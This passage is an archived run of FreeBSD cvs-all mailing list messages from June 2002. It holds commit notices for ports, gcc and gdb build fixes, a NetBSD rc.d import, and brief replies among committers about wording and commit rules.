ESMTP id 8753A37B40E; Fri, 21 Jun 2002 10:33:45 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHXj622933; Fri, 21 Jun 2002 10:33:45 -0700 (PDT) (envelope-from bmah) Message-Id: <200206211733.g5LHXj622933@freefall.freebsd.org> From: "Bruce A. Mah" Date: Fri, 21 Jun 2002 10:33:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys param.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/21 10:33:45 PDT Modified files: (Branch: RELENG_4) sys/sys param.h Log: Somewhat belatedly bump __FreeBSD_version for 4.6-STABLE. Approved by: imp Revision Changes Path 1.61.2.28 +1 -1 src/sys/sys/param.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:40:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B50FD37B401; Fri, 21 Jun 2002 10:40:05 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHe5O23556; Fri, 21 Jun 2002 10:40:05 -0700 (PDT) (envelope-from nectar) Message-Id: <200206211740.g5LHe5O23556@freefall.freebsd.org> From: Jacques Vidrine Date: Fri, 21 Jun 2002 10:40:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/py-PyGreSQL Makefile ports/databases/py-SQLDict Makefile ports/devel/py-kjbuckets Makefile ports/devel/py-xoltar-toolkit Makefile ports/lang/scheme48 Makefile ports/security/smurflog Makefile ports/security/srp ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/21 10:40:05 PDT Modified files: databases/py-PyGreSQL Makefile databases/py-SQLDict Makefile devel/py-kjbuckets Makefile devel/py-xoltar-toolkit Makefile lang/scheme48 Makefile security/smurflog Makefile security/srp Makefile textproc/py-HyperText Makefile www/py-HTMLgen Makefile Log: Drop MAINTAINER: I'm not really taking care of these anymore. Revision Changes Path 1.29 +1 -1 ports/databases/py-PyGreSQL/Makefile 1.2 +1 -1 ports/databases/py-SQLDict/Makefile 1.11 +1 -1 ports/devel/py-kjbuckets/Makefile 1.4 +1 -1 ports/devel/py-xoltar-toolkit/Makefile 1.20 +1 -1 ports/lang/scheme48/Makefile 1.17 +2 -2 ports/security/smurflog/Makefile 1.5 +1 -1 ports/security/srp/Makefile 1.2 +1 -1 ports/textproc/py-HyperText/Makefile 1.13 +2 -2 ports/www/py-HTMLgen/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:43:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A3F737B40D; Fri, 21 Jun 2002 10:43:33 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHhX724595; Fri, 21 Jun 2002 10:43:33 -0700 (PDT) (envelope-from bmah) Message-Id: <200206211743.g5LHhX724595@freefall.freebsd.org> From: "Bruce A. Mah" Date: Fri, 21 Jun 2002 10:43:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/porters-handbook book.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/21 10:43:33 PDT Modified files: en_US.ISO8859-1/books/porters-handbook book.sgml Log: __FreeBSD_version bump for 4.6-RELEASE. Revision Changes Path 1.217 +5 -0 doc/en_US.ISO8859-1/books/porters-handbook/book.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:54:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0983D37B40F; Fri, 21 Jun 2002 10:54:20 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHsK825805; Fri, 21 Jun 2002 10:54:20 -0700 (PDT) (envelope-from mi) Message-Id: <200206211754.g5LHsK825805@freefall.freebsd.org> From: Mikhail Teterin Date: Fri, 21 Jun 2002 10:54:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/tcl-memchan/files Makefile.bsd X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/21 10:54:19 PDT Modified files: devel/tcl-memchan/files Makefile.bsd Log: Remove the previously redundant and now harmful INTERNALLIB line. Revision Changes Path 1.2 +0 -1 ports/devel/tcl-memchan/files/Makefile.bsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11: 6:40 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 9DCB437B40C; Fri, 21 Jun 2002 11:06:32 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5LI6VY59340; Fri, 21 Jun 2002 12:06:31 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost [127.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5LI6UG29874; Fri, 21 Jun 2002 12:06:30 -0600 (MDT) (envelope-from imp@harmony.village.org) Message-Id: <200206211806.g5LI6UG29874@harmony.village.org> To: Poul-Henning Kamp Subject: Re: cvs commit: CVSROOT avail Cc: obrien@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org In-reply-to: Your message of "Fri, 21 Jun 2002 18:56:31 +0200." <35839.1024678591@critter.freebsd.dk> References: <35839.1024678591@critter.freebsd.dk> Date: Fri, 21 Jun 2002 12:06:30 -0600 From: Warner Losh Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <35839.1024678591@critter.freebsd.dk> Poul-Henning Kamp writes: : Yes, because I expected committers to be intelligent enough to do : without detailed rules. I'll refrain from commmeting on the writing the rules down issue... As for the issue of the avail file being a technical enforcement of a long-standing project tradition, why not bring it up with core.3 and let them deside? Might I further suggest that no further commits to avail be made until they have had a chance to have their say on it. A few weeks isn't going to hurt anybody. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11:11:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3895237B409; Fri, 21 Jun 2002 11:11:23 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LIBNp31815; Fri, 21 Jun 2002 11:11:23 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211811.g5LIBNp31815@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 11:11:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc/config/i386 freebsd.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 11:11:23 PDT Modified files: contrib/gcc/config/i386 freebsd.h Log: BDE prefers this organization. Submitted by: bde Revision Changes Path 1.55 +11 -9 src/contrib/gcc/config/i386/freebsd.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11:20:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F7D537B409; Fri, 21 Jun 2002 11:20:27 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LIKRL32601; Fri, 21 Jun 2002 11:20:27 -0700 (PDT) (envelope-from lioux) Message-Id: <200206211820.g5LIKRL32601@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Fri, 21 Jun 2002 11:20:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics Makefile ports/graphics/aoi Makefile distinfo pkg-comment pkg-descr pkg-plist ports/graphics/aoi/files wrapper.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/21 11:20:26 PDT Modified files: graphics Makefile Added files: graphics/aoi Makefile distinfo pkg-comment pkg-descr pkg-plist graphics/aoi/files wrapper.sh Log: New port aoi version 1.1: Art Of Illusion, An open source Java written 3D modelling and rendering studio Revision Changes Path 1.461 +1 -0 ports/graphics/Makefile 1.1 +63 -0 ports/graphics/aoi/Makefile (new) 1.1 +1 -0 ports/graphics/aoi/distinfo (new) 1.1 +9 -0 ports/graphics/aoi/files/wrapper.sh (new) 1.1 +1 -0 ports/graphics/aoi/pkg-comment (new) 1.1 +7 -0 ports/graphics/aoi/pkg-descr (new) 1.1 +13 -0 ports/graphics/aoi/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11:20:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D5A9537B40A; Fri, 21 Jun 2002 11:20:37 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LIKb232683; Fri, 21 Jun 2002 11:20:37 -0700 (PDT) (envelope-from lioux) Message-Id: <200206211820.g5LIKb232683@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Fri, 21 Jun 2002 11:20:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/21 11:20:37 PDT Modified files: . modules Log: aoi --> ports/graphics/aoi Revision Changes Path 1.5395 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11:21:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6784437B40D; Fri, 21 Jun 2002 11:21:30 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LILU333022; Fri, 21 Jun 2002 11:21:30 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211821.g5LILU333022@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 11:21:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc toplev.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 11:21:30 PDT Modified files: contrib/gcc toplev.c Log: cc -O0 and -O1 didn't do the easy optimization of alignment for space. Instead it attempted to do the easy optimization of alignment for time, which should be to 1-byte alignment on i386's. Submitted by: bde Revision Changes Path 1.14 +1 -1 src/contrib/gcc/toplev.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 11:34:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 94BD037B401; Fri, 21 Jun 2002 11:34:49 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LIYnC34099; Fri, 21 Jun 2002 11:34:49 -0700 (PDT) (envelope-from mi) Message-Id: <200206211834.g5LIYnC34099@freefall.freebsd.org> From: Mikhail Teterin Date: Fri, 21 Jun 2002 11:34:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/tcl-memchan/files Makefile.bsd X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/21 11:34:49 PDT Modified files: devel/tcl-memchan/files Makefile.bsd Log: Reverse my last change for the time being. Contrary to my belief, it did not fix -current, but, indeed broke -stable :-\ Revision Changes Path 1.3 +1 -0 ports/devel/tcl-memchan/files/Makefile.bsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12: 5:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E1C2A37B414; Fri, 21 Jun 2002 12:05:20 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJ5Ke39248; Fri, 21 Jun 2002 12:05:20 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211905.g5LJ5Ke39248@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 12:05:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils/gdb Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 12:05:20 PDT Modified files: gnu/usr.bin/binutils/gdb Makefile Log: We need to link with libiberty.a before libreadline.so. Both supply xmalloc() and xrealloc() and the mixed usage of xmalloc in some .c's from libiberty.a and other .c's from libreadline.so produces an unusable binary on the Alpha. While I am here, preventatively move other libs in the link order. Submitted by: gallatin Revision Changes Path 1.58 +4 -4 src/gnu/usr.bin/binutils/gdb/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12: 6:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E322637B412; Fri, 21 Jun 2002 12:06:16 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJ6GC41815; Fri, 21 Jun 2002 12:06:16 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211906.g5LJ6GC41815@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 12:06:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/ivtools Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 12:06:16 PDT Modified files: graphics/ivtools Makefile Log: fix typo Submitted by: Scott Flatman Revision Changes Path 1.4 +1 -1 ports/graphics/ivtools/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12: 7:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E177C37B408; Fri, 21 Jun 2002 12:07:21 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJ7Li42640; Fri, 21 Jun 2002 12:07:21 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211907.g5LJ7Li42640@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 12:07:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/rc.d - Imported sources X-FreeBSD-CVS-Branch: NETBSD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 12:07:21 PDT src/etc/rc.d - Imported sources Update of /home/ncvs/src/etc/rc.d In directory freefall.freebsd.org:/c/tmp/cvs-serv42453 Log Message: Sync with NetBSD's mainline. Status: Vendor Tag: NETBSD Release Tags: head_20020621 C src/etc/rc.d/DAEMON C src/etc/rc.d/LOGIN C src/etc/rc.d/Makefile C src/etc/rc.d/SERVERS C src/etc/rc.d/accounting C src/etc/rc.d/altqd C src/etc/rc.d/amd C src/etc/rc.d/apmd C src/etc/rc.d/bootconf.sh C src/etc/rc.d/bootparams U src/etc/rc.d/ccd C src/etc/rc.d/cleartmp U src/etc/rc.d/cron C src/etc/rc.d/dhclient C src/etc/rc.d/dhcpd C src/etc/rc.d/dhcrelay C src/etc/rc.d/dmesg C src/etc/rc.d/fsck N src/etc/rc.d/ipfs U src/etc/rc.d/inetd C src/etc/rc.d/ipfilter C src/etc/rc.d/ipmon C src/etc/rc.d/ipnat C src/etc/rc.d/ipsec C src/etc/rc.d/kdc C src/etc/rc.d/ldconfig U src/etc/rc.d/lkm1 U src/etc/rc.d/lkm2 C src/etc/rc.d/lkm3 C src/etc/rc.d/local C src/etc/rc.d/lpd C src/etc/rc.d/mopd C src/etc/rc.d/motd U src/etc/rc.d/mountall C src/etc/rc.d/mountcritlocal C src/etc/rc.d/mountcritremote C src/etc/rc.d/mountd C src/etc/rc.d/mrouted C src/etc/rc.d/named C src/etc/rc.d/network C src/etc/rc.d/newsyslog C src/etc/rc.d/nfsd C src/etc/rc.d/nfslocking C src/etc/rc.d/ntpd C src/etc/rc.d/ntpdate C src/etc/rc.d/postfix C src/etc/rc.d/ppp C src/etc/rc.d/pwcheck C src/etc/rc.d/quota C src/etc/rc.d/raidframe C src/etc/rc.d/rarpd C src/etc/rc.d/rbootd U src/etc/rc.d/root C src/etc/rc.d/route6d C src/etc/rc.d/routed C src/etc/rc.d/rpcbind C src/etc/rc.d/rtadvd C src/etc/rc.d/rtsold C src/etc/rc.d/rwho C src/etc/rc.d/savecore C src/etc/rc.d/screenblank C src/etc/rc.d/securelevel C src/etc/rc.d/sendmail C src/etc/rc.d/sshd C src/etc/rc.d/swap1 C src/etc/rc.d/swap2 C src/etc/rc.d/sysctl C src/etc/rc.d/sysdb C src/etc/rc.d/syslogd C src/etc/rc.d/timed C src/etc/rc.d/ttys C src/etc/rc.d/virecover C src/etc/rc.d/wscons U src/etc/rc.d/xdm C src/etc/rc.d/xfs C src/etc/rc.d/ypbind C src/etc/rc.d/yppasswdd U src/etc/rc.d/ypserv C src/etc/rc.d/NETWORKING N src/etc/rc.d/downinterfaces N src/etc/rc.d/ifwatchd C src/etc/rc.d/isdnd C src/etc/rc.d/moused N src/etc/rc.d/ndbootd U src/etc/rc.d/poffd C src/etc/rc.d/racoon N src/etc/rc.d/mixerctl 72 conflicts created by this import. Use the following command to help the merge: cvs checkout -jNETBSD:yesterday -jNETBSD src/etc/rc.d To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12: 9:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B67537B406; Fri, 21 Jun 2002 12:09:46 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJ9kh44129; Fri, 21 Jun 2002 12:09:46 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211909.g5LJ9kh44129@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 12:09:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/binutils/gdbreplay Makefile src/gnu/usr.bin/binutils/gdbserver Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 12:09:45 PDT Modified files: gnu/usr.bin/binutils/gdbreplay Makefile gnu/usr.bin/binutils/gdbserver Makefile Log: Forced commit to note we are pretending contrib/gdb.291 never existed. Revision Changes Path 1.7 +0 -0 src/gnu/usr.bin/binutils/gdbreplay/Makefile 1.8 +0 -0 src/gnu/usr.bin/binutils/gdbserver/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:11:21 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id EFCBD37B435; Fri, 21 Jun 2002 12:10:34 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id FAA13151; Sat, 22 Jun 2002 05:10:32 +1000 Date: Sat, 22 Jun 2002 05:15:29 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/contrib/gcc toplev.c In-Reply-To: <200206211821.g5LILU333022@freefall.freebsd.org> Message-ID: <20020622050504.U5440-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002, David E. O'Brien wrote: > obrien 2002/06/21 11:21:30 PDT > > Modified files: > contrib/gcc toplev.c > Log: > cc -O0 and -O1 didn't do the easy optimization of alignment for space. > Instead it attempted to do the easy optimization of alignment for time, > which should be to 1-byte alignment on i386's. > > Submitted by: bde Urk, I seem to have mangled my N-tuple negatives there. -O0 and -O1 actually optimized alignment for space, but they should optimize alignment for time like they used to. Optimization for space should give 1-byte alignment on i386's, but doesn't quite. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:15:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 507DF37B409; Fri, 21 Jun 2002 12:15:40 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJFeD47771; Fri, 21 Jun 2002 12:15:40 -0700 (PDT) (envelope-from lioux) Message-Id: <200206211915.g5LJFeD47771@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Fri, 21 Jun 2002 12:15:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/py-snmp Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/21 12:15:40 PDT Modified files: net/py-snmp Makefile distinfo Log: Update to 2.0.3 Approved by: maintainer Revision Changes Path 1.4 +6 -1 ports/net/py-snmp/Makefile 1.3 +1 -1 ports/net/py-snmp/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:19:56 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 9BC9937B411; Fri, 21 Jun 2002 12:19:49 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5LJJnP8061055; Fri, 21 Jun 2002 12:19:49 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5LJJnr7061054; Fri, 21 Jun 2002 12:19:49 -0700 (PDT) Date: Fri, 21 Jun 2002 12:19:49 -0700 From: "David O'Brien" To: Bruce Evans Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/contrib/gcc toplev.c Message-ID: <20020621121948.C21840@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Bruce Evans , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206211821.g5LILU333022@freefall.freebsd.org> <20020622050504.U5440-100000@gamplex.bde.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020622050504.U5440-100000@gamplex.bde.org>; from bde@zeta.org.au on Sat, Jun 22, 2002 at 05:15:29AM +1000 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 05:15:29AM +1000, Bruce Evans wrote: > On Fri, 21 Jun 2002, David E. O'Brien wrote: > > > obrien 2002/06/21 11:21:30 PDT > > > > Modified files: > > contrib/gcc toplev.c > > Log: > > cc -O0 and -O1 didn't do the easy optimization of alignment for space. > > Instead it attempted to do the easy optimization of alignment for time, > > which should be to 1-byte alignment on i386's. > > > > Submitted by: bde > > Urk, I seem to have mangled my N-tuple negatives there. -O0 and -O1 I thought your analasys didn't seem quite right, but I know you spent time on it so I went with your wording. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:24:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C662037B407; Fri, 21 Jun 2002 12:24:12 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LJOCA53279; Fri, 21 Jun 2002 12:24:12 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211924.g5LJOCA53279@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 12:24:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc toplev.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 12:24:12 PDT Modified files: contrib/gcc toplev.c Log: Clarify revision 1.14: Gcc 3.1's -O0 and -O1 actually optimized alignment for space, but we feel it should optimize alignment for time like Gcc 2.95 used to. Optimization for space should give 1-byte alignment on i386's, but doesn't quite. Revision Changes Path 1.15 +0 -0 src/contrib/gcc/toplev.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 12:41:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org 